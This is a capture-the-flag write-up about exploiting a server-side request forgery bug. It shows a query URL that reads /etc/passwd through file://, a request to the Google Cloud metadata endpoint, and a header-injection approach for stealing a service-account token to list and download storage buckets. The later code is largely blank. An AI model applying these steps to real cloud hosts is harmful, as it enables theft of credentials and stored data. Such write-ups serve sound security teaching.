Tags: ssrf gcloud buckets cloud

Rating: 5.0

This web server has an ssrf vulnerability. We can fetch files on the system:

http://35.194.175.80:8000/query?site=file:///etc/passwd

We can also visit internal sites, like for example the Google metadata API.

I first fetched the /opt/workdir/main-dc1e2f5f7a4f359bb5ce1317a.py file by leaking the cmdline from /proc/self/cmdline:
python
import urllib.request

@app.route("/query")
def query():
site = request.args.get('site')
return text

@app.route("/")
def hello_world():

if __name__ == "__main__":
app.run(debug=False, host="0.0.0.0", port=8000)


Looks like it is using urllib which may be vulnerable to header injection.
The flag file is pretty much unguessable (They said so in the challenge description), so we can't just guess this name and fetch the flag.
We need to find another way.

http://35.194.175.80:8000/query?site=http://metadata/computeMetadata/

But the legacy endpoints were disabled (Like computeMetadata/v1beta which doesn't require the Metadata-Flavor: Google to be used.
Since we may have a way to inject headers, we can try to inject the *Metadata-Flavor* header:

python
#!/usr/bin/env python3
import requests
import sys

url = "http://35.194.175.80:8000/query"

params = {
}

params_str = "&".join("%s=%s" % (k,v) for k,v in params.items())

r = requests.get(url, params=params_str)
print(r.text)


Run the script and get a token for authorization (I also inserted this token into the script, but ended up using curl to finish this challenge instead)



Use the token to list buckets:



Download the correct container (There were a lot of containers, so I just downloaded them all. The container below is the right one that contains the flag)






FLAG: BALSN{What_permissions_does_the_service_account_need}